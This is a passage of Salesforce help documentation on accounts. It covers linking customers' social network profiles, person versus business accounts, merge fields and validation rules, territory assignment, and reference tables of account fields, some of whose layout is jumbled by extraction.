Using Social Accounts
Social Accounts, Contacts, and Leads Overview
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Using Social Accounts

Business accounts available in: All Editions except Database.com

Person accounts available in: Enterprise, Unlimited, and Developer Editions

When using Social Accounts and Contacts for accounts, you can:

• Sign in to your social network accounts from any account detail page.

• Find your customers’ Facebook, LinkedIn, and Twitter profiles and link them to their account records, so you can view
this information from account detail pages.

• Find YouTube videos related to your accounts and play them from account detail pages.

• See your accounts’ Klout information from account detail pages.

• Modify default search criteria if you’re having trouble locating an account’s social information.

• Configure your Social Accounts and Contacts settings so the Social Accounts and Contacts viewer only shows the social
networks that you want to use.

See Also:
Social Accounts, Contacts, and Leads Overview

Viewing Your Accounts' Social Network Profiles

Business accounts available in: All Editions except Database.com

Person accounts available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Edit” on accountsTo find and link social network profiles to business account
records:

“Edit” on accounts and contactsTo find and link social network profiles to person account
records:

“Read” on accountsTo view an account's social network profiles:

Once you have signed in to your social network accounts from Salesforce, use Social Accounts and Contacts to find your
customers' Facebook, LinkedIn, and Twitter profiles and link them to their account records. Then you can view this information
directly from account detail pages in Salesforce.

1. On the Accounts home page or in an Accounts list view, click an account’s name to display the detail page.

2. In the header on the detail page, click a social network icon ( ).
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3. If a social network profile isn’t associated with the account yet, Salesforce automatically searches for profiles that match
the account name on the account record. Click the correct profile in the search results displayed on the Social Accounts
and Contacts viewer.

Tip:  If the default search doesn't find the correct profile, search again using different search terms.

The profile that you select is linked to the Salesforce record, so other Salesforce users who access the record can also view
the profile.

4. View the social information that your account is sharing with you.

Note:  Depending on the account’s privacy settings, you may not see as much information as you would if logged
directly into your social network account.

5. If you want to view the contact’s profiles on other social networks, just click their tabs in the viewer.
6. You can also:

• Click Show Photo in Salesforce to display the account’s profile picture on the account detail page.
• Click View Full Profile to see the account’s complete social network profile directly in the social network.
• Click Find Different Profile to change the social network profile that is linked to the account record.
• Click Sign Out to close the private connection between Salesforce and your social network account. When you do this,

you're unable to see your accounts’ social network profiles until you sign in again.

See Also:
Using Social Accounts
Data.com Social Key Overview—Beta

Viewing Your Accounts’ Klout Information

Business accounts available in: All Editions except Database.com

Person accounts available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on accountsTo view an account’s Klout information:

You can use Social Accounts and Contacts to see your accounts’ Klout information, directly from account detail pages in
Salesforce.

Note:

The Klout service is dependent on Twitter—an administrator must enable Twitter in your organization’s Social
Accounts and Contacts settings and you must be signed in to your Twitter account. You don’t need a Klout account,
or have to be signed in to your Klout account, to see Klout information in Salesforce.
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Before Klout information is available for an account, you or someone else in your organization needs to associate a
Twitter profile with the account record.

To see Klout information for an account:

1. On the Accounts home page or in an Accounts list view, click an account’s name to display the detail page.
2. In the header on the detail page, click the Klout icon ( ).
3. View the account’s Klout information.

See Also:
Using Social Accounts

Viewing YouTube Videos about Your Accounts

Business accounts available in: All Editions except Database.com

Person accounts available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on accountsTo find and view YouTube videos related to accounts:

You can use Social Accounts and Contacts to find YouTube videos related to your accounts and play them from account detail
pages in Salesforce.

1. On the Accounts home page or in an Accounts list view, click an account’s name to display the detail page.
2. In the header on the detail page, click the YouTube icon ( ).
3. In the YouTube search results, click the video that you want to watch.

Tip:  If the default search doesn't find videos for the correct company, search again using different search terms.

4. The YouTube player opens in the Social Accounts and Contacts viewer and the video begins playing.

See Also:
Using Social Accounts
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What is a Person Account?
Business accounts available in: All Editions except Database.com

Person accounts available in: Enterprise, Unlimited, and Developer Editions

Note: Person accounts are not enabled by default in Salesforce. To quickly verify whether your organization uses
person accounts, see if you have an option to select Person Account as the record type when you create a new account.
To request person accounts, check with your administrator.

A person account is an individual consumer with whom you do business, such as a financial services client, an online shopper,
or a vacation traveler. Person accounts are applicable to organizations that operate on a business-to-consumer model as opposed
to a business-to-business model.

In a business-to-business model, there is a natural differentiation between the other businesses with whom you work and the
people associated with those businesses. In Salesforce, that translates to accounts and contacts having different fields, features,
and tabs. In a business-to-consumer model, because you are providing products or services to people rather than companies
or organizations, the distinction between accounts and contacts does not exist. Consequently, person accounts in Salesforce
have a combination of fields from both accounts and contacts, and can be used as contacts in most situations that involve
contacts. For example, business accounts do not have standard fields for email address and job title, but person accounts do.
Also, person accounts can be associated with campaigns just like contacts, but business accounts cannot. For details on the
contact-specific functionality that applies to person accounts, see Person Account Behaviors on page 757.

The ability for person accounts to act like contacts is made possible by applying an account record type which has special
properties. The default name of this record type is “Person Account.” Your administrator may have changed the name of this
record type, and also may have created more account record types that have the same special properties.

Note:  In the online help and other Salesforce documentation, the word “account” by itself always refers to both
business accounts and person accounts. The terms “business account” and “person account” are used when there are
differences between the two kinds of accounts.

See Also:
Person Account Behaviors
Accounts Overview
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Merge Fields for Person Accounts

Business accounts available in: All Editions except Database.com

Person accounts available in: Enterprise, Unlimited, and Developer Editions

Note: Person accounts are not enabled by default in Salesforce. To quickly verify whether your organization uses
person accounts, see if you have an option to select Person Account as the record type when you create a new account.
To request person accounts, check with your administrator.

The list of available merge fields depends on the type of data that you’re working with. This topic lists considerations for
working with merge fields with person accounts.

• Both business account and person account fields are available as account merge fields. Account fields exclusive to person
accounts, such as Birthdate, Email, and Title have Account.Person in their merge field names. For example,
{!Account.PersonBirthdate}.

• If your organization uses person accounts, both business account and person account fields are available as account merge
fields. Account fields exclusive to person accounts, such as Birthdate, Email, and Title have “Account.Person” in
their merge field names. For example, {!Account.PersonBirthdate}.

• You can use the merge field {!Account.IsPersonAccount} to determine whether you are working with a person account or
a business account.

• Account fields that previously had unique names and labels may no longer be unique because some contact fields are

displayed as part of the account object. These fields on the accounts page are identified by the person account icon ( ).
Ensure that all custom account fields have field names and labels unique to your organization so that the merge field
references the correct field. For more information, see What is a Person Account? on page 755.

Important:  Ensure that all custom fields under account have unique field names and labels so that the merge field
references the correct field.

See Also:
Accounts Overview
Validation Rules for Person Accounts

Validation Rules for Person Accounts

Business accounts available in: All Editions except Database.com

Person accounts available in: Enterprise, Unlimited, and Developer Editions

Note: Person accounts are not enabled by default in Salesforce. To quickly verify whether your organization uses
person accounts, see if you have an option to select Person Account as the record type when you create a new account.
To request person accounts, check with your administrator.
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A merge field is a field you can put in an email template, mail merge template, custom link, or formula to incorporate values
from a record. The list of available merge fields depends on the type of data that you’re working with. This topic lists
considerations for working with merge fields in validation rules with person accounts.

Tips

• To define a validation rule that applies only to person accounts, use the IsPersonAccount merge field. For example,
Account.City = “San Francisco” verifies that a business or person account’s city is San Francisco, while
IsPersonAccount ( Account.City = “San Francisco”) verifies that a person account’s city is San Francisco.

• You must handle person account and business account names separately in account validation rules.

◊ For business accounts, use the Name merge field.
◊ For person accounts, use the FirstName and LastName merge fields.

• Birthdate, Email, and other fields that are only supported for person accounts are available as merge fields in account
validation rules. When you use one of those merge fields, note that business account records will be processed as if those
fields have blank values. For business account and person account fields, see Account Fields on page 767.

See Also:
Accounts Overview
Merge Fields for Person Accounts

What is a business account and how does it differ from a person account?
A business account is a company, corporation, firm, or other business entity to which you can associate multiple contacts.
Business accounts are available in all Editions and have a folder icon ( ).

In Enterprise, Unlimited, and Developer Editions, your Salesforce organization can be enabled to use person accounts ( ),
which are individual consumers who function simultaneously as accounts and contacts.

See Also:
Accounts Overview

Person Account Behaviors

Business accounts available in: All Editions except Database.com

Person accounts available in: Enterprise, Unlimited, and Developer Editions

Note: Person accounts are not enabled by default in Salesforce. To request person accounts, contact salesforce.com.

Person accounts are accounts that can also be used as contacts in many situations. The following table summarizes the key
areas in which person accounts differ from business accounts or have unique considerations:
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Person accounts can only be merged with other person
accounts. See Merging Duplicate Accounts on page 781.

Account Merge

On the accounts home page, the fields in the Quick Create
area are based on whether the default account record type set

Account Quick Create

on your profile is a person account record type or a business
account record type.

Person accounts are accounts that support contact fields and
capabilities.

Accounts

Person accounts can be associated with activities using either
the Name or Related To fields.

As with contacts, person accounts can be invited to events and
requested meetings.

Activities

For users to request a meeting with a person account, the
Email field must be added to the Person Accounts page
layout.

As with contacts, person accounts can be added to campaigns
and have a Campaign History related list.

Campaigns

On cases, person accounts can be entered in the Account
Name field, the Contact Name field, or both.

Cases

When you follow person accounts, you follow the account
fields, but not the contact fields. 

Chatter Feed Tracking

As with contacts, you can add person accounts to the Contact
Roles related list on cases, contracts, and opportunities.

Contact Roles

In most situations, you can use person accounts as if they were
contacts. You can include them in all contact list views except
on the contacts home page.

Unlike business accounts, person accounts do not have a
Contacts related list. However, you can use the Partners related
list to track relationships between different person accounts.

Contacts

Custom objects with relationships to either accounts or
contacts can be added as related lists on person accounts.

Custom Objects

As with contacts, person accounts can be enabled as users for
your Customer Portals.

Customer Portal

Person accounts are not supported by Data.com Prospector
or Data.com Clean.

Data.com

Person accounts are currently supported in Connect Offline,
Salesforce for Outlook, and Connect for Outlook version 3.2

Desktop Integration
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Person Account BehaviorSalesforce Functionality

and later. They are not currently supported in Connect for
Lotus Notes.

As with contacts, you can send individual emails and mass
emails to person accounts.

Email

Account fields for person accounts can be tracked using the
account field history settings, but contact fields for person

Field History

accounts are configured on the contact field history settings
page.

A predetermined combination of standard account and contact
fields is available on person account page layouts. In addition,

Fields

all custom account and contact fields are available. See Person
Account Fields on page 774.

Note that some business account fields are not supported for
person accounts, such as Parent Account and View
Hierarchy. Also, the Reports To field on contacts is not
supported for person accounts.

You can rename field labels for a person account so alternate
terms display in Salesforce.

Person accounts have a person icon ( ), while business

accounts have a folder icon ( ). The person account icon can

Icons

be added to search results, list views, and lookup dialogs using
the criteria “Is Person Account equals True.”

Person accounts have unique import wizards..Import Wizards

Leads with a blank Company field are converted to person
accounts. The default person account record type for your

Leads

profile is applied to the new person account. Note that you
can only create leads with a blank Company field using the
Force.com API. Leads with a value in the Company field are
converted to business accounts. The default business account
record type for your profile is applied to the new business
account.

Person accounts appear in both account and contact list views.
Add the Is Person Account icon to list views to visually

List Views

differentiate person accounts from other records, and to include
or exclude person accounts in a list.

Mobile configurations that include the account object
automatically deliver person accounts and business accounts
to users' mobile devices.

Person accounts can be excluded from the configuration's data
set using the criteria “Is Person Account equals False.”

Mobile Configurations

To mobilize only person accounts, use the criteria “Is
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Person Account equals True.” If a mobile configuration
includes accounts but not contacts, users assigned to that
configuration will see a Contacts tab in the mobile client
application, and the tab will contain person accounts.

Person accounts have unique page layouts that can have
account fields, contact fields, account custom links, account

Page Layouts

related lists, and contact related lists. Person accounts page
layouts do not support the Reports To and Parent
Account fields.

You can use the Partners related list to relate person accounts
to each other. We recommend that you rename the Partners

Partners

related list to “Related Accounts,” “Relationships,” or a similar
term that reflects how your person accounts are connected.

Administrators can configure multiple record types for person
accounts. A person account can only be changed to another
person account record type.

Record Types

Administrators can customize the names of tabs and fields
related to person accounts, such as:

Renamed Tabs and Standard Fields

• The Accounts tab name, the business account field
label, and the person account field label.

• The Contacts tab name and the business contact
field label.

Person accounts only appear in account search results.
Administrators can add the Is Person Account icon to

Search

account search layouts in order to differentiate person accounts
from business accounts.

As with contacts, person accounts can be enabled as users for
your Self-Service portal.

Self-Service Portal

Note:  Starting with Spring ’12, the Self-Service
portal isn’t available for new organizations. Existing
organizations continue to have access to the
Self-Service portal.

Contact sharing is not available if you have enabled person
accounts. The organization-wide default for contacts is set to
Controlled by Parent and is not editable.

If your organization has customized your contact sharing
settings and you want to enable person accounts, change your

Sharing Settings

organization-wide default for contacts to Controlled by Parent,
which removes all your contact sharing rules and manually
shared contacts.
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As with contacts, you can send individual and mass
Stay-in-Touch requests to person accounts.

Stay-in-Touch Requests

Person accounts count against both account and contact
storage because the API considers each person account to
consist of one account as well as one contact.

Storage

Creating or editing a person account triggers account workflow
rules.

Workflow Rules

See Also:
What is a Person Account?
Tip sheet: Tips & Hints for Person Accounts

Accounts Home
Business accounts available in: All Editions except Database.com

Person accounts available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on accountsTo view the Accounts tab:

“Read” on accountsTo view accounts:

“Create” on accountsTo create business accounts:

“Create” on accounts and contactsTo create person accounts:

Clicking on the Accounts tab displays the accounts home page.

• If your administrator has enabled Quick Create, you can add a new account from the Quick Create area in the sidebar on
the accounts home page. If your organization uses person accounts and your default record type for the Accounts tab is a
person account record type, then the Quick Create fields include First Name and Last Name instead of Account
Name.

Alternatively, click New next to the Recent Accounts section to create a new account.

• Under Reports, click any report name to jump to that report.

• Select any of the links under Tools to access utilities for managing your accounts.

• If accounts are shared with external contacts via Salesforce to Salesforce, choose one of the list views under Accounts from
Connections to view accounts that your business partners have shared with you.
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Note:  If your organization has Salesforce for Wealth Management, accounts are called clients.

See Also:
Accounts Overview

Viewing Account Lists
Business accounts available in: All Editions except Database.com

Person accounts available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on accountsTo view account lists:

“Create” on accountsTo create business accounts:

“Create” on accounts and contactsTo create person accounts:

The accounts list page displays a list of accounts in your current view.

• Click an account name to view the account details.

• Click Edit or Del next to an account name to edit or delete the account.

• Click New Account or select Account from the Create New drop-down list in the sidebar to create an account.

• Click the Open Calendar link at the bottom of the page to display a weekly view of a calendar underneath the list.
Then, you can drag a record from the list to a time slot on the calendar to quickly create an event associated with the record.
Note that your administrator controls the availability of drag-and-drop scheduling.

• If your organization uses person accounts and your current list view includes the field Is Person Account, the column

heading for this field is the person account icon ( ). Click the person account icon in the header to sort person accounts
at either the top or bottom of the list.

Note:  If your organization has Salesforce for Wealth Management, accounts are called clients.

See Also:
Accounts Home
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Using Accounts
Business accounts available in: All Editions except Database.com

Person accounts available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on accountsTo view accounts:

“Edit” on accountsTo edit business accounts:

“Edit” on accounts and contactsTo edit person accounts:

“Manage External Users”To enable partner accounts:

“Edit” on accounts

AND

“Manage External Users”

To disable partner accounts:

“Edit” on accounts

AND

“Edit Self-Service Users”

To disable Customer Portal accounts:

An account is an organization, company, or consumer that you want to track—for example, a customer, partner, or competitor.

• View and edit accounts.

• Use Social Accounts and Contacts to view your accounts’ social network profiles, see their level of influence in social media,
and watch related YouTube videos.

• Find account-related information (such as contacts).

• Get Data.com contacts for an account.

• Clean account records with Data.com Clean.

• View account updates and comments using Chatter.

• Give Customer Portal users access to an account.

• Enable an account as a partner account.
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Displaying and Editing Account Details
Business accounts available in: All Editions except Database.com

Person accounts available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on accountsTo view accounts:

“Edit” on accountsTo edit business accounts:

“Edit” on accounts and contactsTo edit person accounts:

“Manage External Users”To enable partner accounts:

“Edit” on accounts

AND

“Manage External Users”

To disable partner accounts:

“Edit” on accounts

AND

“Edit Self-Service Users”

To disable Customer Portal accounts:

Once you have located an account on the Accounts home or list pages, click the account name to display detailed information.

• Use inline editing to edit fields directly on the detail page. If inline editing isn’t enabled, contact your administrator.

• To display the page in edit mode, click Edit, make your changes, and click Save.

• To save the current account and create another one, click Save & New.

• To open a printable display of the record details, in the top-right corner of the page, click Printable View.

• To enable an account as a partner account, click Manage External Account and choose Enable as Partner. Available only
if your company enabled a partner portal.

• To enable person accounts as Customer Portal users, click Manage External User and choose Enable Customer User.
Available only if your company has person accounts and a Customer Portal.

Note:  As the owner of an account, you can normally view all data related to that account.

However, your administrator can set an option on your role that determines whether you can view opportunities that
you do not own that are associated with your accounts.

Also, if your accounts are assigned to territories, your administrator can set options that determine whether users in
that territory can view, edit, transfer, or delete your accounts.

See Also:
Account Fields
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Changing the Territories of an Account
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Territories”

OR

You are a forecast manager, Forecast managers can
manage territories is selected, and you are working
below your position in the territory hierarchy.

To change the territories of an account:

To modify an account's manually assigned territories:

1. From the account detail page, click Change next to the Territories field.
2. At the Rule-based territory assignments list, view the territories that contain the account due to active account

assignment rules. You cannot use this page to remove the account from these territories; to do so you must modify the
account assignment rules that evaluated the account.

3. If the account has existing manual assignments to one or more territories, the names of those territories will appear in the
Selected territories list.

4. Click Select and Deselect to move territories between the Available territories list and the Selected territories list.
5. Optionally, click Horizontal View or Vertical View  in the drop-down list to place the Selected territories list either

alongside or below the Available territories list.
6. When the Selected territories list contains the territories to which the account should be manually assigned, click Save to

finish and return to the account detail page.

See Also:
Territory Management Overview
Manually Assigning Accounts to Territories
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Account History
Business accounts available in: All Editions except Database.com

Person accounts available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on accountsTo view accounts:

The Account History related list of an account detail page tracks the changes to the account. Any time a user modifies any of
the standard or custom fields whose history is set to be tracked on the account, a new entry is added to the Account History
related list. For person accounts, this includes any relevant contact fields that are set to be tracked. All entries include the date,
time, nature of the change, and who made the change. Modifications to the related lists on the account are not tracked in the
account history.

See Also:
Accounts Home

Guidelines for Creating Accounts
Business accounts available in: All Editions except Database.com

Person accounts available in: Enterprise, Unlimited, and Developer Editions

Keep these guidelines and tips in mind when creating accounts.

• To create business accounts, you need “Create” permission on accounts. To create person accounts, you need “Create”
permission on both accounts and contacts.

• If your organization uses record types, you might be prompted to choose a Record Type when creating an account.
Different record types can have different fields and different picklist values.

• To specify that a business account is a subsidiary of another business account, fill in the Parent Account field. You can
then view a hierarchy of account relationships. The Parent Account field isn’t available for person accounts.

• Use the Account Site field to designate different locations of the same company. For example, Acme.com may have
offices in Paris and London. Create two accounts, both called Acme.com, but with Account Site values of Paris and
London, respectively.

• If your organization uses divisions, the division of a new account is automatically set to your default division, unless you
manually select a different one.
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• If your organization uses territory management, account assignment rules can automatically assign newly created accounts
to territories. See Territory Management Overview on page 972.

See Also:
Account Fields
Viewing Parent Accounts
Creating Records

Account Fields
Business Account Fields

The available business account fields vary according to which Salesforce Edition you have.

Person accounts available in: Enterprise, Unlimited, and Developer Editions

The available person account fields vary according to which Salesforce Edition you have.

A business account has the following fields, listed in alphabetical order. Depending on your page layout and field-level security
settings, some fields may not be visible or editable.

If the account record was added from Data.com, certain fields, as identified here, will be populated with the Data.com or Dun
& Bradstreet (D&B) value, if a value is available. Some Data.com fields are available to only organizations that use a specific
Data.com product. Those fields are identified in their descriptions.

Allows Value from Data.com or D&BDescriptionField

The default currency for all currency
amount fields in the account. Amounts

Account Currency

display in the account currency and are
also converted to the user’s personal
currency. Available only for
organizations that use multiple
currencies.

Division to which the account belongs.
Records related to the account, such as

Account Division

contacts and opportunities,
automatically inherit the account’s
division. Available only in organizations
that use divisions to segment their data.

 (D&B)Name of company. Up to 255 characters
are allowed in this field.

Account Name

The name of the account translated into
the local language.

Account Name (Local)
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Allows Value from Data.com or D&BDescriptionField

Tracking or reference number for
account. Up to 40 characters are allowed
in this field.

Account Number

Assigned owner of account. Not
available in Personal Edition.

Account Owner

Name of the field that determines what
picklist values are available for the

Account Record Type

record. Available in Enterprise,
Unlimited, and Developer Editions.

 (D&B)Information about the account’s
location, such as single location,

Account Site

Headquarters, or Branch. Up to
80 characters are allowed in this field.

 (Data.com)The source of the account record. For
example, Advertisement,

Account Source

Data.com, or Trade Show. The
source is selected from a picklist of
available values, which are set by an
administrator. Each picklist value can
have up to 40 characters.

 (D&B)Amount of annual reported revenue.Annual Revenue

Note: If you clean your
account records with Data.com
Prospector or Data.com Clean,
Data.com converts non-USD
currencies to USD every
month, which may cause the
values in this field to change.
For organizations that use
non-USD currencies, we ignore
the Annual Revenue field
when determining a record’s
clean status (so the Clean
Status field’s value does not
change). We also remove the
value from the Annual
Revenue field on account
records and the clean
comparison page.

 (D&B)City portion of billing address. Up to
40 characters are allowed in this field.

Billing City

 (D&B)Country portion of billing address. Up
to 80 characters are allowed in this field.

Billing Country
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Allows Value from Data.com or D&BDescriptionField

 (D&B)The billing country for the address.
Entry is selected from a picklist of
standard values.

Billing Country (beta)

 (D&B)State or province portion of billing
address. Up to 80 characters are allowed
in this field.

Billing State/Province

 (D&B)The billing state or province for the
address. Entry is selected from a picklist
of standard values.

Billing State/Province (beta)

 (D&B)Street address used for billing. Up to
255 characters are allowed in this field.

Billing Street

 (D&B)Zip or postal code portion of billing
address. Up to 20 characters are allowed
in this field.

Billing Zip/Postal Code

 (Data.com)Indicates the record’s clean status as
compared with Data.com. Values are:

Clean Status

Not Compared, In Sync,
Reviewed, Different, Not
Found, or Inactive. This field is
available to only organizations that use
Data.com Prospector or Data.com
Clean.

Note:  If you clean your
account records with Data.com
Prospector or Data.com Clean,
Data.com converts non-USD
currencies to USD every
month, which may cause the
values in the Annual
Revenue field to change. For
organizations that use
non-USD currencies, we ignore
the Annual Revenue field
when determining a record’s
clean status (so the Clean
Status field’s value does not
change).

User who created the account, including
creation date and time. (Read only)

Created By

 (Data.com)The ID of the company in Data.com.
When Salesforce records are compared

Data.com Key

with Data.com records (via either
manual cleaning or automated clean
jobs), if Data.com finds a match, the
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Allows Value from Data.com or D&BDescriptionField

two records are linked by this field’s
numeric value.

 (D&B)A link to the corresponding D&B
Company record, which displays Dun

D&B Company

& Bradstreet (D&B) fields for the
account. Use the lookup if you need to
associate a different D&B Company
record with the account. This field is
only available to organizations that use
Data.com Premium Prospector or
Data.com Premium Clean.

 (D&B)Description of account. Up to 32 KB of
data are allowed in this field. Only the
first 255 characters display in reports.

Description

 (D&B)The Data Universal Numbering System
(D-U-N-S) number is a unique,

D-U-N-S Number

nine-digit number assigned to every
business location in the D&B database
that has a unique, separate, and distinct
operation. D-U-N-S numbers are used
by industries and organizations around
the world as a global standard for
business identification and tracking.
This field is available to only
organizations that use Data.com
Prospector or Data.com Clean.

Note:

To see the entire D-U-N-S
number, either

• Add the account to
Salesforce if you haven’t
yet, or

• Clean the account with
Data.com if it already exists
in Salesforce

Until you add or clean the
record, its first five digits will
be masked with asterisks (*).

 (D&B)Number of people employed by the
account.

Employees

When checked, causes account
assignment rules to run when the

Evaluate this account against
territory rules on save

account is edited and saved. When
customizing the page layout for
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Allows Value from Data.com or D&BDescriptionField

accounts, an administrator can control
whether this checkbox displays and
whether it is checked by default. See
Territory Management Overview on
page 972.

When checked, shields the account from
being evaluated when account

Exclude from territory
assignment rules

assignment rules are run, preventing it
from being automatically assigned to
territories. Also, if the account is already
assigned to territories as a result of
assignment rules, checking this box
removes the account from those
territories. This checkbox only affects
rule-based account assignments and has
no effect on manual account
assignments. See Territory Management
Overview on page 972.

 (D&B)Fax number. Up to 40 characters are
allowed in this field.

Fax

 (Data.com)Primary business of account. Entry is
selected from a picklist of available

Industry

values, which are set by an
administrator. Each picklist value can
have up to 40 characters.

User who last changed the account
fields, including modification date and

Modified By

time. This does not track changes made
to any of the related list items on the
account. (Read only)

 (D&B)The six-digit North American Industry
Classification System (NAICS) code is

NAICS Code

the standard used by business and
government to classify business
establishments into 20 industries,
according to their economic activity for
the purpose of collecting, analyzing, and
publishing statistical data related to the
U.S. business economy. This field is
available to only organizations that use
Data.com Prospector or Data.com
Clean.

 (D&B)A brief description of an organization’s
line of business, based on its NAICS

NAICS Description

code. This field is available to only
organizations that use Data.com
Prospector or Data.com Clean.
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Allows Value from Data.com or D&BDescriptionField

 (D&B)Ownership of company, for example,
public or private. Entry is selected from

Ownership

a picklist of available values, which are
set by an administrator. Each picklist
value can have up to 40 characters.

Parent company for companies that are
subsidiaries of a larger company or

Parent Account

organization. The parent account must
be an existing account in Salesforce. You
can enter the account name, or select (or
optionally, create) the account using the
lookup icon.

Read-only field that indicates whether
an account is a partner account.

Partner Account

 (D&B)Primary phone number of account. Up
to 40 characters are allowed in this field.

Phone

Categorization of how you rate this
account, for example, Hot, Cold. Entry

Rating

is selected from a picklist of available
values, which are set by an
administrator. Each picklist value can
have up to 40 characters.

 (D&B)City portion of primary mailing or
shipping address. Up to 40 characters
are allowed in this field.

Shipping City

 (D&B)Country portion of primary mailing or
shipping address. Up to 80 characters
are allowed in this field.

Shipping Country

 (D&B)The shipping country for the address.
Entry is selected from a picklist of
standard values.

Shipping Country (beta)

 (D&B)State or province portion of primary
mailing or shipping address. Up to 80
characters are allowed in this field.

Shipping State/Province

 (D&B)The shipping state or province for the
address. Entry is selected from a picklist
of standard values.

Shipping State/Province (beta)

 (D&B)Primary mailing or shipping street
address of account. Up to 255 characters
are allowed in this field.

Shipping Street

 (D&B)Zip or postal code portion of primary
mailing or shipping address. Up to 20
characters are allowed in this field.

Shipping Zip/Postal Code
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Allows Value from Data.com or D&BDescriptionField

 (D&B)Standard Industrial Classification code
of the account’s main business

SIC Code

categorization. Up to 10 characters are
allowed in this field.

 (D&B)A brief description of an organization’s
line of business, based on its SIC code.

SIC Description

The territories to which the account has
been assigned. See Territory
Management Overview on page 972.

Territories

 (D&B)The abbreviation used to identify
publicly traded shares of a particular

Ticker Symbol

stock. Also known as the stock symbol.
Up to 20 characters are allowed in this
field.

 (D&B)A name, different from its legal name,
that an organization may use for

Tradestyle

conducting business. Similar to “Doing
business as” or “DBA”. This field is
available to only organizations that use
Data.com Prospector or Data.com
Clean.

Type of account, for example,
Customer, Competitor, or Partner.

Type

Entry is selected from a picklist of
available values, which are set by an
administrator. Each picklist value can
have up to 40 characters.

Listing of custom links for accounts as
set up by your administrator.

Custom Links

 (Data.com)URL of account’s website, for example,
www.acme.com. Up to 255 characters

Website

are allowed in this field; only the first
50 are displayed.

 (D&B)The year the company was established
or the year when current ownership or

Year Started

management assumed control of the
company. If the company establishment
or ownership year is unavailable, then
the year the D&B record was created
will be used. D&B does not supply this
data for branch locations.This field is
available to only organizations that use
Data.com Prospector or Data.com
Clean.
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Person Account Fields

A person account has the following standard fields, listed in alphabetical order. Depending on your page layout and field-level
security settings, some fields may not be visible or editable. Fields with an “X” in the Is Contact Field column are contact
fields that are supported for person accounts but not business accounts.

Note that this list does not include any custom fields that your administrator may have created. Both account and contact
custom fields are available for person accounts.

Is Contact FieldDescriptionField

The default currency for all currency
amount fields in the account. Amounts

Account Currency

display in the account currency and are
also converted to the user’s personal
currency. Available only for organizations
that use multiple currencies.

Division to which the account belongs.
Records related to the account, such as

Account Division

contacts and opportunities, automatically
inherit the account’s division. Available
only in organizations that use divisions
to segment their data.

The name of the individual. In person
accounts, the account name cannot be

Account Name

edited directly. Instead, Salesforce derives
it by combining the First Name and
Last Name fields in the appropriate
order per the user's language setting.

The name of the account translated into
the local language.

Account Name (Local)

Tracking or reference number for
account. Up to 40 characters are allowed
in this field.

Account Number

Assigned owner of account. Not available
in Personal Edition.

Account Owner

Name of the field that determines what
picklist values are available for the record.

Account Record Type

Available in Enterprise, Unlimited, and
Developer Editions.

Information about the account’s location,
such as single location,

Account Site

Headquarters, or Branch. Up to 80
characters are allowed in this field.

Amount of annual reported revenue.Annual Revenue

Name of assistant. Up to 40 characters
are allowed in this field.

Assistant

Assistant’s phone number. Up to 40
characters are allowed in this field.

Asst. Phone
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Is Contact FieldDescriptionField

City portion of billing address. Up to 40
characters are allowed in this field.

Billing City

Country portion of billing address. Up
to 80 characters are allowed in this field.

Billing Country

The billing country for the address. Entry
is selected from a picklist of standard
values.

Billing Country (beta)

State or province portion of billing
address. Up to 80 characters are allowed
in this field.

Billing State/Province

The billing state or province for the
address. Entry is selected from a picklist
of standard values.

Billing State/Province (beta)

Street address used for billing. Up to 255
characters are allowed in this field.

Billing Street

Zip or postal code portion of billing
address. Up to 20 characters are allowed
in this field.

Billing Zip/Postal Code

Birthday. You can enter a date, or choose
a date from the calendar that displays
when you put your cursor in the field.

Birthdate

User who created the account, including
creation date and time. (Read only)

Created By

Listing of custom links for accounts as
set up by your administrator.

Custom Links

Associated business or organizational
unit. Up to 80 characters are allowed in
this field.

Department

Description of account. Up to 32 KB of
data are allowed in this field. Only the
first 255 characters display in reports.

Description

Indicates that the contact does not want
to be contacted by phone. If you use

Do Not Call

Data.com, the Phone field value will be
masked out in search results and on the
Contact Card, and it will be blank in
.csv files created when you export
records.

Email address. Must be a valid email
address in the form:

Email

jsmith@acme.com. Up to 80 characters
are allowed in this field.
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Is Contact FieldDescriptionField

Indicates that the contact does not want
to receive email.  If you use Data.com,

Email Opt Out

the Email field value will be masked out
in search results and on the Contact
Card, and it will be blank in .csv files
created when you export records.

Number of people employed by the
account.

Employees

When checked, causes account
assignment rules to run when the account

Evaluate this account against
territory rules on save

is edited and saved. When customizing
the page layout for accounts, an
administrator can control whether this
checkbox displays and whether it is
checked by default. See Territory
Management Overview on page 972.

When checked, shields the account from
being evaluated when account assignment

Exclude from territory
assignment rules

rules are run, preventing it from being
automatically assigned to territories.
Also, if the account is already assigned
to territories as a result of assignment
rules, checking this box removes the
account from those territories. This
checkbox only affects rule-based account
assignments and has no effect on manual
account assignments. See Territory
Management Overview on page 972.

Fax number. Up to 40 characters are
allowed in this field.

Fax

Indicates if the person has requested not
to be included in broadcast faxes.

Fax Opt Out

The first or given name of the individual.
Up to 40 characters are allowed in this
field.

First Name

Person’s home phone number. Up to 40
characters are allowed in this field.

Home Phone

Primary business of account. Entry is
selected from a picklist of available

Industry

values, which are set by an administrator.
Each picklist value can have up to 40
characters.

The surname or family name of the
individual. Up to 80 characters are
allowed in this field.

Last Name
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Is Contact FieldDescriptionField

The date that the most recent
Stay-in-Touch request was sent.

Last Stay-in-Touch Request
Date

The date that the most recent
Stay-in-Touch request was returned and
merged.

Last Stay-in-Touch Save Date

Record source, for example,
Advertisement, Partner, or Web. Entry

Lead Source

is selected from a picklist of available
values, which are set by an administrator.
Each picklist value can have up to 40
characters.

City portion of mailing address. Up to
40 characters are allowed in this field.

Mailing City

Country portion of mailing address. Up
to 80 characters are allowed in this field.

Mailing Country

The mailing country for the address.
Entry is selected from a picklist of
standard values.

Mailing Country (beta)

State or province portion of mailing
address. Up to 80 characters are allowed
in this field.

Mailing State/Province

The mailing state or province for the
address. Entry is selected from a picklist
of standard values.

Mailing State/Province (beta)

Street mailing address. Up to 255
characters are allowed in this field.

Mailing Street

Zip or postal code portion of mailing
address. Up to 20 characters are allowed
in this field.
